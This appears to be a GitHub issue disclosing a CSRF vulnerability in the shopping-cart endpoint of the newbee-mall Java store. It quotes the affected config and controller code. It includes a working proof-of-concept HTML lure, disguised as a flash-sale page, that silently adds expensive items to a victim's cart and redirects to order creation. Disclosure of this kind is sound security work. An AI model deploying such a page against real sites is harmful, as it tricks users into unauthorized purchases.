Skip to content

CSRF Vulnerability in Shopping Cart Item Addition #110

New issue
New issue
Open
Open
CSRF Vulnerability in Shopping Cart Item Addition#110
@flashzyc

Description

@flashzyc
flashzyc
opened on Feb 5, 2026

CSRF Vulnerability in Shopping Cart Item Addition

Summary

A CSRF vulnerability exists in the shopping cart addition endpoint /shop-cart (POST). Attackers can add arbitrary items to users' shopping carts, which can be chained with the order creation CSRF to force unauthorized purchases.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/shop-cart/**");
        // ❌ No CSRF token validation configured
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java (Lines 63-76)

@PostMapping("/shop-cart")
@ResponseBody
public Result saveNewBeeMallShoppingCartItem(@RequestBody NewBeeMallShoppingCartItem newBeeMallShoppingCartItem,
                                             HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    newBeeMallShoppingCartItem.setUserId(user.getUserId());
    // ❌ No CSRF token validation
    // ⚠️ Accepts JSON payload from any origin
    String saveResult = newBeeMallShoppingCartService.saveNewBeeMallCartItem(newBeeMallShoppingCartItem);
    if (ServiceResultEnum.SUCCESS.getResult().equals(saveResult)) {
        return ResultGenerator.genSuccessResult();
    }
    return ResultGenerator.genFailResult(saveResult);
}

Security Issues:

  1. ❌ No CSRF token validation
  2. ⚠️ Accepts JSON requests with credentials: include
  3. ⚠️ Can be chained with order creation for full attack

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Special Offer - Limited Time!</title>
</head>
<body>
    <h1>🎁 Flash Sale! 90% OFF</h1>
    <p>Adding special offers to your cart...</p>
    
    <script>
        // Add expensive items to victim's shopping cart
        var itemsToAdd = [
            {goodsId: 10047, goodsCount: 5},   // Expensive item 1
            {goodsId: 10048, goodsCount: 10},  // Expensive item 2
            {goodsId: 10049, goodsCount: 3}    // Expensive item 3
        ];
        
        itemsToAdd.forEach(function(item) {
            fetch('http://localhost:28089/shop-cart', {
                method: 'POST',
                credentials: 'include',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify(item)
            })
            .then(response => response.json())
            .then(data => console.log('Added item:', item.goodsId));
        });
        
        // Step 2: Redirect to order creation (chain attack)
        setTimeout(function() {
            window.location.href = 'http://localhost:28089/saveOrder';
        }, 2000);
    </script>
</body>
</html>

Impact

Unauthorized shopping cart manipulation leading to forced purchases - When combined with order creation CSRF, attackers can force users to buy unwanted expensive items.

CVSS Score: 7.6 (High)

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions